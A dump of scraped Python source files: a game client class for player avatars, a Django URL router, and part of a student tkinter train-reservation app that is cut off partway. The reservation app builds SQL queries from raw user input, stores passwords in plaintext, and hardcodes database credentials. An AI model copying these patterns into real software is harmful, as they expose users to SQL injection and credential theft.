+{"seq_id":"74084018922","text":"from direct.directnotify.DirectNotifyGlobal import directNotify\nfrom direct.interval.IntervalGlobal import Sequence, Wait, Func, SoundInterval\nfrom direct.interval.IntervalGlobal import Parallel, LerpPosInterval, LerpQuatInterval, LerpHprInterval\n\nfrom DistributedPlayerToonShared import DistributedPlayerToonShared\nfrom src.coginvasion.toon.DistributedToon import DistributedToon\nfrom src.coginvasion.gags.backpack.Backpack import Backpack\nfrom src.coginvasion.gags import GagGlobals\nfrom src.coginvasion.gui.LaffOMeter import LaffOMeter\nfrom src.coginvasion.hood import LinkTunnel\nfrom src.coginvasion.globals import ChatGlobals\nfrom src.coginvasion.phys import PhysicsUtils\nfrom src.coginvasion.distributed import AdminCommands\n\nclass DistributedPlayerToon(DistributedToon, DistributedPlayerToonShared):\n notify = directNotify.newCategory('DistributedPlayerToon')\n \n def __init__(self, cr):\n try:\n self.DistributedPlayerToon_initialized\n return\n except:\n self.DistributedPlayerToon_initialized = 1\n DistributedToon.__init__(self, cr)\n DistributedPlayerToonShared.__init__(self)\n self.role = None\n self.ghost = 0\n self.puInventory = []\n self.equippedPU = -1\n self.backpack = Backpack(self)\n self.battleMeter = None\n self.headMeter = None\n self.firstTimeChangingHP = True\n \n # Quest-related variables.\n self.quests = \"\"\n self.tier = None\n self.questHistory = None\n \n self.busy = 1\n self.friends = None\n self.tutDone = 0\n self.hoodsDiscovered = []\n self.teleportAccess = []\n self.lastHood = 0\n self.defaultShard = 0\n self.tunnelTrack = None\n self.trackExperience = dict(GagGlobals.DefaultTrackExperiences)\n \n self.takeDmgSfx = base.audio3d.loadSfx('phase_5/audio/sfx/tt_s_ara_cfg_toonHit.ogg')\n base.audio3d.attachSoundToObject(self.takeDmgSfx, self)\n return\n \n def getHealth(self):\n return DistributedPlayerToonShared.getHealth(self)\n \n def getMaxHealth(self):\n return DistributedPlayerToonShared.getMaxHealth(self)\n \n def stopSmooth(self):\n DistributedToon.stopSmooth(self)\n localAvatarReachable = (hasattr(base, 'localAvatar') and base.localAvatar)\n if localAvatarReachable and self.doId != base.localAvatar.doId:\n self.resetTorsoRotation()\n\n def handleHealthChange(self, hp, oldHp):\n if hp < oldHp and not self.firstTimeChangingHP:\n # We took damage, make oof sound.\n self.takeDmgSfx.play()\n\n def setHealth(self, health):\n self.handleHealthChange(health, self.getHealth())\n DistributedToon.setHealth(self, health)\n if self.doId != base.localAvatar.doId:\n if not self.firstTimeChangingHP:\n if health < self.getMaxHealth():\n if not self.headMeter:\n self.__makeHeadMeter()\n else:\n self.__updateHeadMeter()\n else:\n self.__removeHeadMeter()\n self.firstTimeChangingHP = False\n\n def announceHealthAndPlaySound(self, level, hp, extraId = -1):\n DistributedToon.announceHealth(self, level, hp, extraId)\n hpSfx = base.audio3d.loadSfx('phase_11/audio/sfx/LB_toonup.ogg')\n base.audio3d.attachSoundToObject(hpSfx, self)\n SoundInterval(hpSfx, node = self).start()\n del hpSfx\n \n def setChat(self, chat):\n chat = ChatGlobals.filterChat(chat, self.animal)\n DistributedToon.setChat(self, chat)\n \n def goThroughTunnel(self, toZone, inOrOut, requestStatus = None):\n # inOrOut: 0 = in; 1 = out\n\n if self.tunnelTrack:\n self.ignore(self.tunnelTrack.getDoneEvent())\n self.tunnelTrack.finish()\n self.tunnelTrack = None\n\n linkTunnel = LinkTunnel.getTunnelThatGoesToZone(toZone)\n if not linkTunnel:\n return\n self.tunnelTrack = Parallel(name = self.uniqueName('Place.goThroughTunnel'))\n\n if inOrOut == 0:\n # Going in a tunnel!\n pivotPoint = linkTunnel.inPivotPoint\n pivotPointNode = linkTunnel.tunnel.attachNewNode('tunnelPivotPoint')\n pivotPointNode.setPos(pivotPoint)\n pivotPointNode.setHpr(linkTunnel.inPivotStartHpr)\n \n x, y, z = self.getPos(render)\n surfZ = PhysicsUtils.getNearestGroundSurfaceZ(self, self.getHeight() + self.getHeight() / 2.0)\n \n if not surfZ == -1:\n # Let's use the ray-tested surface z-point instead so we don't come out of the tunnel hovering.\n # This is just in case the user jumped into the tunnel, which in that case would mean that they are\n # airborne and we can't depend on their current Z value.\n z = surfZ\n \n if base.localAvatar.doId == self.doId:\n doneMethod = self._handleWentInTunnel\n extraArgs = [requestStatus]\n base.localAvatar.walkControls.setCollisionsActive(0, andPlaceOnGround=1)\n self.resetHeadHpr(override = True)\n camera.wrtReparentTo(linkTunnel.tunnel)\n currCamPos = camera.getPos()\n currCamHpr = camera.getHpr()\n tunnelCamPos = linkTunnel.camPos\n tunnelCamHpr = linkTunnel.camHpr\n camera.setPos(tunnelCamPos)\n camera.setHpr(tunnelCamHpr)\n self.tunnelTrack.append(LerpPosInterval(\n camera,\n duration = 0.7,\n pos = tunnelCamPos,\n startPos = currCamPos,\n blendType = 'easeOut'\n ))\n self.tunnelTrack.append(LerpQuatInterval(\n camera,\n duration = 0.7,\n quat = tunnelCamHpr,\n startHpr = currCamHpr,\n blendType = 'easeOut'\n ))\n\n self.wrtReparentTo(pivotPointNode)\n self.setPos(x, y, z)\n self.resetTorsoRotation()\n self.stopLookAround()\n \n if linkTunnel.__class__.__name__ == \"SafeZoneLinkTunnel\":\n self.setHpr(180, 0, 0)\n else:\n self.setHpr(0, 0, 0)\n \n exitSeq = Sequence(Func(self.loop, 'run'))\n if base.localAvatar.doId == self.doId:\n exitSeq.append(Wait(2.0))\n exitSeq.append(Func(base.transitions.irisOut))\n self.tunnelTrack.append(exitSeq)\n self.tunnelTrack.append(Sequence(\n LerpHprInterval(\n pivotPointNode,\n duration = 2.0,\n hpr = linkTunnel.inPivotEndHpr,\n startHpr = linkTunnel.inPivotStartHpr,\n ), LerpPosInterval(\n pivotPointNode,\n duration = 1.0,\n pos = (linkTunnel.inPivotEndX, pivotPointNode.getY(), pivotPointNode.getZ()),\n startPos = (linkTunnel.inPivotStartX, pivotPointNode.getY(), pivotPointNode.getZ())\n ), Func(self.reparentTo, hidden)))\n elif inOrOut == 1:\n \n # Going out!\n pivotPoint = linkTunnel.outPivotPoint\n pivotPointNode = linkTunnel.tunnel.attachNewNode('tunnelPivotPoint')\n pivotPointNode.setPos(pivotPoint)\n pivotPointNode.setHpr(linkTunnel.outPivotStartHpr)\n \n exitSeq = Sequence()\n \n if base.localAvatar.doId == self.doId:\n base.localAvatar.walkControls.setCollisionsActive(0, andPlaceOnGround=1)\n base.localAvatar.detachCamera()\n camera.reparentTo(linkTunnel.tunnel)\n tunnelCamPos = linkTunnel.camPos\n tunnelCamHpr = linkTunnel.camHpr\n camera.setPos(tunnelCamPos)\n camera.setHpr(tunnelCamHpr)\n doneMethod = self._handleCameOutTunnel\n extraArgs = []\n \n exitSeq.append(Func(base.transitions.irisIn))\n else:\n self.stopSmooth()\n \n self.reparentTo(pivotPointNode)\n self.setHpr(linkTunnel.toonOutHpr)\n self.setPos(linkTunnel.toonOutPos)\n \n seq = Sequence(\n Func(self.loop, 'run'),\n LerpPosInterval(\n pivotPointNode,\n duration = 1.0,\n pos = (linkTunnel.outPivotEndX, pivotPointNode.getY(), pivotPointNode.getZ()),\n startPos = (linkTunnel.outPivotStartX, pivotPointNode.getY(), pivotPointNode.getZ())\n ),\n LerpHprInterval(\n pivotPointNode,\n duration = 2.0,\n hpr = linkTunnel.outPivotEndHpr,\n startHpr = linkTunnel.outPivotStartHpr,\n )\n )\n if base.localAvatar.doId != self.doId:\n seq.append(Func(self.startSmooth))\n seq.append(Func(self.wrtReparentTo, render))\n exitSeq.append(seq)\n self.tunnelTrack.append(exitSeq)\n\n if base.localAvatar.doId == self.doId:\n self.tunnelTrack.setDoneEvent(self.tunnelTrack.getName())\n self.acceptOnce(self.tunnelTrack.getDoneEvent(), doneMethod, extraArgs)\n\n self.tunnelTrack.start()\n \n def setDefaultShard(self, shardId):\n self.defaultShard = shardId\n\n def getDefaultShard(self):\n return self.defaultShard\n\n def setLastHood(self, zoneId):\n self.lastHood = zoneId\n\n def b_setLastHood(self, zoneId):\n self.sendUpdate('setLastHood', [zoneId])\n self.setLastHood(zoneId)\n\n def getLastHood(self):\n return self.lastHood\n\n def setTeleportAccess(self, array):\n self.teleportAccess = array\n\n def getTeleportAccess(self):\n return self.teleportAccess\n\n def setHoodsDiscovered(self, array):\n self.hoodsDiscovered = array\n\n def b_setHoodsDiscovered(self, array):\n self.sendUpdate('setHoodsDiscovered', [array])\n self.setHoodsDiscovered(array)\n\n def getHoodsDiscovered(self):\n return self.hoodsDiscovered\n\n def setTutorialCompleted(self, value):\n self.tutDone = value\n\n def getTutorialCompleted(self):\n return self.tutDone\n\n def setFriendsList(self, friends):\n self.friends = friends\n\n def getFriendsList(self):\n return self.friends\n\n def setBusy(self, busy):\n self.busy = busy\n\n def getBusy(self):\n return self.busy\n\n def setTier(self, tier):\n self.tier = tier\n\n def getTier(self):\n return self.tier\n\n def setQuestHistory(self, array):\n self.questHistory = array\n\n def getQuestHistory(self):\n return self.questHistory\n\n def setQuests(self, dataStr):\n self.quests = dataStr\n\n def getQuests(self):\n return self.quests\n\n def maybeMakeHeadMeter(self):\n if base.localAvatar.doId != self.doId:\n if self.getHealth() < self.getMaxHealth():\n if not self.headMeter:\n self.__makeHeadMeter()\n\n def __makeHeadMeter(self):\n self.headMeter = LaffOMeter(forRender = True)\n r, g, b, _ = self.getHeadColor()\n animal = self.getAnimal()\n maxHp = self.getMaxHealth()\n hp = self.getHealth()\n self.headMeter.generate(r, g, b, animal, maxHP = maxHp, initialHP = hp)\n self.headMeter.reparentTo(self)\n self.headMeter.setZ(self.getHeight() + 2)\n self.headMeter.setScale(0.4)\n self.headMeter.setBillboardAxis()\n self.__updateHeadMeter()\n\n def __removeHeadMeter(self):\n if self.headMeter:\n self.headMeter.disable()\n self.headMeter.delete()\n self.headMeter = None\n\n def __updateHeadMeter(self):\n if self.headMeter:\n self.headMeter.updateMeter(self.getHealth())\n \n def d_createBattleMeter(self):\n self.sendUpdate('makeBattleMeter', [])\n\n def b_createBattleMeter(self):\n self.makeBattleMeter()\n self.d_createBattleMeter()\n\n def d_cleanupBattleMeter(self):\n self.sendUpdate('destroyBattleMeter', [])\n\n def b_cleanupBattleMeter(self):\n self.destroyBattleMeter()\n self.d_cleanupBattleMeter()\n\n def makeBattleMeter(self):\n if self.getHealth() < self.getMaxHealth():\n if not self.battleMeter:\n self.battleMeter = LaffOMeter()\n r, g, b, _ = self.getHeadColor()\n animal = self.getAnimal()\n maxHp = self.getMaxHealth()\n hp = self.getHealth()\n self.battleMeter.generate(r, g, b, animal, maxHP = maxHp, initialHP = hp)\n self.battleMeter.reparentTo(self)\n self.battleMeter.setZ(self.getHeight() + 5)\n self.battleMeter.setScale(0.5)\n self.battleMeter.start()\n\n def destroyBattleMeter(self):\n if self.battleMeter:\n self.battleMeter.stop()\n self.battleMeter.disable()\n self.battleMeter.delete()\n self.battleMeter = None\n\n def setEquippedPU(self, index):\n self.equippedPU = index\n\n def getEquippedPU(self):\n return self.equippedPU\n\n def setPUInventory(self, array):\n self.puInventory = array\n\n def getPUInventory(self):\n return self.puInventory\n\n def setGhost(self, value):\n self.ghost = value\n self.handleGhost(value)\n\n def d_setGhost(self, value):\n self.sendUpdate(\"setGhost\", [value])\n\n def b_setGhost(self, value):\n self.d_setGhost(value)\n self.setGhost(value)\n\n def getGhost(self):\n return self.ghost\n\n def getBackpack(self):\n return self.backpack\n\n def setEquippedAttack(self, attackID):\n try: \n self.backpack.setCurrentGag(attackID) \n except:\n # If we couldn't do this, it means that the avatar was most likely disabled. \n pass\n DistributedToon.setEquippedAttack(self, attackID)\n\n def getCurrentGag(self):\n return self.getEquippedAttack()\n\n def setLoadout(self, gagIds):\n if self.backpack:\n loadout = []\n for i in range(len(gagIds)):\n gagId = gagIds[i]\n gag = self.backpack.getGagByID(gagId)\n if gag:\n loadout.append(gag)\n self.backpack.setLoadout(loadout)\n \n def setBackpackAmmo(self, netString):\n if len(self.attackIds) != 0 or len(self.attacks) != 0:\n self.cleanupAttacks()\n self.clearAttackIds()\n return self.backpack.updateSuppliesFromNetString(netString)\n \n def getBackpackAmmo(self):\n if self.backpack:\n return self.backpack.netString\n return GagGlobals.getDefaultBackpack().toNetString()\n \n def setTrackExperience(self, netString):\n self.trackExperience = GagGlobals.getTrackExperienceFromNetString(netString)\n if GagGlobals.processTrackData(self.trackExperience, self.backpack) and self == base.localAvatar:\n if base.localAvatar.invGui:\n base.localAvatar.reloadInvGui()\n \n def getTrackExperience(self):\n return GagGlobals.trackExperienceToNetString(self.trackExperience)\n\n def updateAttackAmmo(self, gagId, ammo, maxAmmo, ammo2, maxAmmo2, clip, maxClip):\n if self.useBackpack():\n self.backpack.setSupply(gagId, ammo)\n else:\n DistributedToon.updateAttackAmmo(self, gagId, ammo, maxAmmo, ammo2, maxAmmo2, clip, maxClip)\n\n def setMoney(self, money):\n self.money = money\n\n def getMoney(self):\n return self.money\n\n def setAccessLevel(self, value):\n prevLevel = self.getAccessLevel()\n self.role = AdminCommands.Roles.get(value, None)\n \n if prevLevel != AdminCommands.NoAccess:\n # Let's remove any tokens that already are showing up.\n DistributedToon.removeAdminToken(self)\n \n if self.role:\n # Let's put a new token above our head.\n DistributedToon.setAdminToken(self, self.role.token)\n\n def getAccessLevel(self):\n return AdminCommands.NoAccess if not self.role else self.role.accessLevel\n \n def disable(self):\n base.audio3d.detachSound(self.takeDmgSfx)\n self.takeDmgSfx = None\n if self.tunnelTrack:\n self.ignore(self.tunnelTrack.getDoneEvent())\n self.tunnelTrack.finish()\n self.tunnelTrack = None\n self.role = None\n self.ghost = None\n self.puInventory = None\n self.equippedPU = None\n if self.backpack:\n self.backpack.cleanup()\n self.backpack = None\n self.firstTimeChangingHP = None\n self.quests = None\n self.tier = None\n self.questHistory = None\n self.busy = None\n self.friends = None\n self.tutDone = None\n self.hoodsDiscovered = None\n self.teleportAccess = None\n self.lastHood = None\n self.defaultShard = None\n self.trackExperience = None\n self.__removeHeadMeter()\n self.destroyBattleMeter()\n DistributedToon.disable(self)\n \n def delete(self):\n try:\n self.DistributedPlayerToon_deleted\n except:\n self.DistributedPlayerToon_deleted = 1\n DistributedPlayerToonShared.delete(self)\n del self.takeDmgSfx\n del self.tunnelTrack\n del self.role\n del self.ghost\n del self.puInventory\n del self.equippedPU\n del self.backpack\n del self.firstTimeChangingHP\n del self.quests\n del self.tier\n del self.questHistory\n del self.busy\n del self.friends\n del self.tutDone\n del self.hoodsDiscovered\n del self.teleportAccess\n del self.lastHood\n del self.defaultShard\n del self.trackExperience\n del self.battleMeter\n del self.headMeter\n DistributedToon.delete(self)\n return\n","repo_name":"Cog-Invasion-Online/cio-src","sub_path":"game/src/coginvasion/toon/DistributedPlayerToon.py","file_name":"DistributedPlayerToon.py","file_ext":"py","file_size_in_byte":18496,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"19"}
+{"seq_id":"26067499157","text":"from rest_framework import routers\nfrom accounts import views as accounts_views\nfrom django.conf.urls import url, include\nfrom django.urls import path\n\nrouter = routers.DefaultRouter()\nrouter.register(r'register', accounts_views.SignupViewSet, basename='register'),\nrouter.register(r'book_list', accounts_views.BookList, basename='book_list'),\nrouter.register(r'add_into_book_list', accounts_views.AddBook, basename='add_into_book_list'),\nrouter.register(r'delete_book', accounts_views.DeleteBook, basename='delete_book'),\nrouter.register(r'book_details', accounts_views.BookDetails, basename='book_details'),\nrouter.register(r'update_book_details', accounts_views.UpdateBookDetails, basename='update_book_details'),\n\nurlpatterns = [\n url(r'', include(router.urls)),\n url(r'^login', accounts_views.LoginViewSet.as_view(), name=\"login\"),\n]\n","repo_name":"prajktaraje/keywordio","sub_path":"DjangoBackend/LibraryManagementSystemBackend/rest_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"32920174625","text":"#Arthi Nithi, Anjani Agrawal, Alan Chiang, Alaap Murali\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter.ttk import *\nimport pymysql\nimport calendar\nimport datetime\nfrom math import *\nimport time\nclass Phase_three:\n def __init__(self,primaryWin):\n self.primaryWin = primaryWin\n self.Login()\n self.results1 = []\n self.entrys=[]\n self.newUserWindow = Toplevel()\n #self.Register()\n self.newUserWindow.title(\"New User Registration\")\n self.newUserWindow.withdraw()\n\n self.primaryWindow = Toplevel()\n self.primaryWindow.title(\"Welcome \"+self.username.get())\n self.primaryWindow.withdraw()\n\n self.schoolInfoWin= Toplevel()\n self.schoolInfoWin.title(\"Add School Info\")\n self.schoolInfoWin.withdraw()\n\n self.trainSchWin= Toplevel()\n self.trainSchWin.title(\"View Train Schedule\")\n self.trainSchWin.withdraw()\n\n self.scheduleWin= Toplevel()\n self.scheduleWin.title(\"View Train Schedule\")\n self.scheduleWin.withdraw()\n\n self.findAvailWindow= Toplevel()\n self.findAvailWindow.title(\"Search Train\")\n self.findAvailWindow.withdraw()\n\n self.departureWin = Toplevel()\n self.departureWin.title(\"Select Departure\")\n self.departureWin.withdraw()\n\n self.passengerInfoWin = Toplevel()\n self.passengerInfoWin.title(\"Travel Extras & Passenger Info\")\n self.passengerInfoWin.withdraw()\n\n self.reservationWin = Toplevel()\n self.reservationWin.title(\"Make Reservation\")\n self.reservationWin.withdraw()\n\n self.paymentIWin = Toplevel()\n self.paymentIWin.title(\"Add Card\")\n self.paymentIWin.withdraw()\n\n self.paymentIWin2 = Toplevel()\n self.paymentIWin2.title(\"Delete Card\")\n self.paymentIWin2.withdraw()\n\n self.confirm = Toplevel()\n self.confirm.title(\"Confirmation\")\n self.confirm.withdraw()\n\n self.updateWin = Toplevel()\n self.updateWin.title(\"Update Reservation\")\n self.updateWin.withdraw()\n\n self.updateWin2 = Toplevel()\n self.updateWin2.title(\"Update Reservation\")\n self.updateWin2.withdraw()\n\n self.updateWin3 = Toplevel()\n self.updateWin3.title(\"Update Reservation\")\n self.updateWin3.withdraw()\n\n self.cancelWin = Toplevel()\n self.cancelWin.title(\"Cancel Reservation\")\n self.cancelWin.withdraw()\n\n self.cancelWin2 = Toplevel()\n self.cancelWin2.title(\"Cancel Reservation\")\n self.cancelWin2.withdraw()\n\n self.viewReviewWin = Toplevel()\n self.viewReviewWin.title(\"View review\")\n self.viewReviewWin.withdraw()\n\n self.viewReviewWin2 = Toplevel()\n self.viewReviewWin2.title(\"View review\")\n self.viewReviewWin2.withdraw()\n\n self.giveReviewWin = Toplevel()\n self.giveReviewWin.title(\"Give Review\")\n self.giveReviewWin.withdraw()\n\n self.viewRevenueReport = Toplevel()\n self.viewRevenueReport.title(\"View Revenue Report\")\n self.viewRevenueReport.withdraw()\n\n self.viewpopRRWin = Toplevel()\n self.viewpopRRWin.title(\"View Popular Route Report\")\n self.viewpopRRWin.withdraw()\n\n def Connect(self):\n try:\n db = pymysql.connect(host=\"academic-mysql.cc.gatech.edu\", user=\"cs4400_Team_48\", passwd=\"dwet2rPC\",db=\"cs4400_Team_48\")\n return db\n except:\n messagebox.showerror(\"Error\", \"Check Internet Connection\")\n\n def Login(self):\n self.primaryWin.title(\"Login\")\n frame = Frame(self.primaryWin)\n frame.pack()\n frame2 = Frame(self.primaryWin)\n frame2.pack()\n\n label1 = Label(frame,text = \"Username\")\n label2 = Label(frame,text =\"Password\")\n label1.grid(row = 0, column = 0,sticky=E)\n label2.grid(row = 1, column = 0,sticky=E)\n self.username = StringVar()\n self.password = StringVar()\n entry1 = Entry(frame, textvariable = self.username, width = 30)\n entry1.grid(row = 0, column = 1)\n entry2 = Entry(frame, textvariable = self.password, width = 30)\n entry2.grid(row = 1, column = 1)\n\n b1=Button(frame2, text =\"Login\", command=self.loginCredentials)\n b1.pack(side=LEFT)\n b2=Button(frame2, text =\"Register\", command= self.switchToRegister)\n b2.pack(side=LEFT)\n\n def loginCredentials(self):\n if self.username.get() == \"\" or self.password.get() == \"\":\n messagebox.showerror(\"Error\", \"Invalid input\")\n return\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Username FROM CUSTOMER \\\n WHERE (CUSTOMER.Username = '%s' AND (SELECT Password FROM USER WHERE CUSTOMER.Username = USER.Username) = '%s')\" % (self.username.get(), self.password.get())\n cursor.execute(query)\n result1 = cursor.fetchall()\n query = \"SELECT Username FROM MANAGER \\\n WHERE (MANAGER.Username = '%s' AND (SELECT Password FROM USER WHERE MANAGER.Username = USER.Username) = '%s')\" % (self.username.get(), self.password.get())\n\n cursor.execute(query)\n result2 = cursor.fetchall()\n\n if len(result1) != 0:\n self.custOrManag = \"customer\"\n for row in result1:\n self.name = row[0]\n self.switchtoMainMenu()\n elif len(result2) != 0:\n self.custOrManag = \"manager\"\n for row in result2:\n self.name = row[0]\n self.switchtoMainMenu()\n else:\n messagebox.showerror(\"Error\", \"Invalid username or password\")\n\n def mainMenu(self):\n self.primaryWindow = Toplevel()\n self.primaryWindow.title(\"Choose Functionality \")\n buttonsFrame = Frame(self.primaryWindow)\n buttonsFrame.pack()\n if self.custOrManag == \"customer\":\n b1 = Button(buttonsFrame, text =\"View Train Schedule\", command = self.trainSchedule)\n b1.grid(row = 0, column = 0, columnspan = 2, sticky = EW)\n b2 = Button(buttonsFrame, text =\"Make a new reservation\", command = self.searchTrain)\n b2.grid(row = 1, column = 0, columnspan = 2, sticky = EW)\n b3 = Button(buttonsFrame, text =\"Update a reservation\", command = self.updateReservation)\n b3.grid(row = 2, column = 0, columnspan = 2, sticky = EW)\n b4 = Button(buttonsFrame, text =\"Cancel a reservation\", command = self.cancelRes)\n b4.grid(row = 3, column = 0, columnspan = 2, sticky = EW)\n b5 = Button(buttonsFrame, text =\"Give review\", command = self.giveReview)\n b5.grid(row = 4, column = 0, columnspan = 2, sticky = EW)\n b6 = Button(buttonsFrame, text =\"Add school information (student discount)\", command = self.schoolInfo)\n b6.grid(row = 5, column = 0, columnspan = 2, sticky = EW)\n b7 = Button(buttonsFrame, text =\"Log out\", command = self.logout)\n b7.grid(row = 6, column = 0, columnspan = 2, sticky = EW)\n elif self.custOrManag == \"manager\":\n b8 = Button(buttonsFrame, text =\"View revenue report\", command = self.viewRevenueRep)\n b8.grid(row = 0, column = 0, columnspan = 2, sticky = EW)\n b9 = Button(buttonsFrame, text =\"View popular route report\", command = self.viewpopRR)\n b9.grid(row = 1, column = 0, columnspan = 2, sticky = EW)\n b10=Button(buttonsFrame, text =\"Log out\", command = self.logout)\n b10.grid(row = 2, column = 0, columnspan = 2, sticky = EW)\n\n def switchToRegister(self):\n self.primaryWin.withdraw()\n self.newUserWindow.deiconify()\n self.Register()\n #self.primaryWin.withdraw()\n\n def switchToLogin(self):\n self.newUserWindow.withdraw()\n self.primaryWin.deiconify()\n\n def switchtoMainMenu(self):\n self.primaryWin.withdraw()\n #self.primaryWindow.deiconify()\n self.mainMenu()\n\n def Register(self):\n self.newUserWindow.title(\"New User Registration\")\n frame=Frame(self.newUserWindow)\n frame.pack()\n frame2=Frame(self.newUserWindow)\n frame2.pack(side = BOTTOM)\n\n label1 = Label(frame,text = \"Username\", justify = LEFT)\n label1.grid(row = 0, column = 0, sticky = W)\n self.registeredUser = StringVar()\n self.uentry = Entry(frame, textvariable = self.registeredUser, width = 30, justify = RIGHT)\n self.uentry.grid(row = 0, column = 1, sticky = W)\n\n label2 = Label(frame,text =\"Email Address\", justify = LEFT)\n label2.grid(row = 1, column = 0, sticky = W)\n self.registerEmail = StringVar()\n self.email_entry = Entry(frame, textvariable = self.registerEmail, width = 30, justify = RIGHT)\n self.email_entry.grid(row = 1, column = 1, sticky = W)\n\n label3 = Label(frame,text = \"Password\", justify = LEFT)\n label3.grid(row = 2, column = 0, sticky = W)\n self.registeredPass = StringVar()\n self.password_entry = Entry(frame, textvariable = self.registeredPass, width = 30, justify = RIGHT)\n self.password_entry.grid(row = 2, column = 1, sticky = W)\n\n label4 = Label(frame,text =\"Confirm Password\", justify = LEFT)\n label4.grid(row = 3, column = 0, sticky = W)\n self.registeredPassConfirm = StringVar()\n self.confirm_password_entry = Entry(frame, textvariable = self.registeredPassConfirm, width = 30, justify = RIGHT)\n self.confirm_password_entry.grid(row = 3, column = 1, sticky = W)\n\n b_reg=Button(frame2, text =\"Create\", command = self.registerCredentials)\n b_reg.pack(side = BOTTOM)\n\n def registerCredentials(self):\n if self.registeredUser.get() == \"\" or self.registeredPass.get() == \"\" or self.registeredPassConfirm.get() == \"\" or self.registerEmail.get() == \"\":\n messagebox.showerror(\"Error\", \"Invalid input\")\n return\n\n if self.registeredPass.get() != self.registeredPassConfirm.get():\n messagebox.showerror(\"Error\", \"Passwords must match\")\n return\n\n db = self.Connect()\n cursor = db.cursor()\n query1 = \"SELECT * FROM USER \\\n WHERE USER.Username = '%s'\" % (self.registeredUser.get())\n\n cursor.execute(query1)\n result1 = cursor.fetchall()\n\n\n if len(result1) != 0:\n messagebox.showerror(\"Error\", \"Username already in use\")\n return\n\n querypatch = \"INSERT INTO USER(Username, Password) VALUES ('%s' , '%s')\" % (self.registeredUser.get(), self.registeredPass.get())\n cursor.execute(querypatch)\n result3 = cursor.fetchall()\n\n query2 = \"INSERT INTO CUSTOMER(Username, Email) \\\n VALUES ('%s', '%s')\" % (self.registeredUser.get(), self.registerEmail.get())\n cursor.execute(query2)\n result2 = cursor.fetchall()\n\n cursor.close()\n db.commit()\n db.close()\n self.switchToLogin()\n\n def schoolInfo(self):\n self.primaryWindow.destroy()\n self.schoolInfoWin = Toplevel()\n self.schoolInfoWin.title(\"Add School Info\")\n frame1 = Frame(self.schoolInfoWin)\n frame2 = Frame(self.schoolInfoWin)\n frame1.pack(side = TOP)\n frame2.pack(side = BOTTOM)\n self.emailaddress = StringVar()\n self.entry = Entry(frame1, textvariable = self.emailaddress, width = 30)\n self.entry.grid(row = 0, column = 1)\n label1 = Label(frame1,text = \"School Email Address\")\n label1.grid(row = 0, column = 0)\n label2 = Label(frame1,text = \"Your school email adress ends with .edu\")\n label2.grid(row = 1, column = 0)\n\n b1 = Button(frame2, text =\"Back\", command = self.sMAINMENU)\n b1.grid(row = 2, column = 0)\n b2 = Button(frame2, text =\"Submit\", command = self.writeToDB)\n b2.grid(row = 2, column = 1)\n\n def writeToDB(self):\n server = self.Connect()\n cursor = server.cursor()\n query = \"UPDATE CUSTOMER SET Email = '%s' WHERE Username = '%s'\" % (self.emailaddress.get(),self.username.get())\n cursor.execute(query)\n if self.emailaddress.get()[-4:] == \".edu\":\n query = \"UPDATE CUSTOMER SET Is_student = 1 WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n server.commit()\n cursor.close()\n server.close()\n\n self.schoolInfoWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def logout(self):\n self.primaryWindow.destroy()\n self.primaryWin = Toplevel()\n self.Login()\n\n def sMAINMENU(self):\n self.schoolInfoWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def trainSchedule(self):\n self.primaryWindow.destroy()\n self.trainSchWin = Toplevel()\n self.trainSchWin.title(\"View Train Schedule\")\n frame1 = Frame(self.trainSchWin)\n frame2 = Frame(self.trainSchWin)\n frame1.pack(side = TOP)\n frame2.pack(side = BOTTOM)\n label1 = Label(frame1,text = \"Train Number\")\n label1.pack(side=LEFT)\n\n self.trainNumber = IntVar()\n self.entry = Entry(frame1, textvariable = self.trainNumber, width = 10)\n self.entry.pack(side=RIGHT)\n\n b1 = Button(frame2, text =\"Search\", command = self.schedule)\n b1.pack(side=LEFT)\n\n def getTrainTree(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"arrv\",\"dept\",\"stat\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"arrv\", text= \"Arrival Time\")\n tree.heading(\"dept\", text= \"Departure Time\")\n tree.heading(\"stat\", text= \"Station\")\n return tree\n\n def schedule(self):\n self.trainSchWin.destroy()\n self.scheduleWin = Toplevel()\n self.scheduleWin.title(\"View Train Schedule\")\n\n frame1 = Frame(self.scheduleWin)\n frame1.pack()\n\n tree = self.getTrainTree(frame1)\n server = self.Connect()\n cursor = server.cursor()\n\n trainNum = self.trainNumber.get()\n query1 = \"SELECT * FROM STOP WHERE Train_Number = '%d'\" % (trainNum)\n\n cursor.execute(query1)\n results = cursor.fetchall()\n i = 0\n for result in results:\n tree.insert('', i, text='', values=(result[2], result[0],result[1], result[3]))\n i += 1\n\n b1 = Button(frame1, text =\"Back\", command = self.switchToMainMenu)\n b1.pack(side= BOTTOM)\n\n def switchToMainMenu(self):\n self.scheduleWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def searchTrain(self):\n self.primaryWindow.withdraw()\n self.findAvailWindow = Toplevel()\n\n self.findAvailWindow.title(\"Search Train\")\n frame = Frame(self.findAvailWindow)\n frame.pack(side=TOP)\n frame1=Frame(self.findAvailWindow)\n frame1.pack(side=TOP)\n frame2=Frame(self.findAvailWindow)\n frame2.pack(side=TOP)\n frame3=Frame(self.findAvailWindow)\n frame3.pack(side=TOP)\n\n location= Label(frame,text = \"Departs From\")\n location.grid(row = 0, column = 0, sticky = E)\n self.city = StringVar()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Name FROM STATION\"\n cursor.execute(query)\n results = cursor.fetchall()\n\n option=OptionMenu(frame, self.city, results[0], *results)\n option.grid(row = 0, column = 1, sticky = W)\n\n arriveAt= Label(frame1,text =\"Arrive At\")\n arriveAt.grid(row = 1, column = 0, sticky = E)\n self.arrv = StringVar()\n\n option=OptionMenu(frame1, self.arrv, results[0], *results)\n option.grid(row = 1, column = 1, sticky = W)\n\n depDate= Label(frame2,text =\"Departure Date (YYYY-MM-DD)\")\n 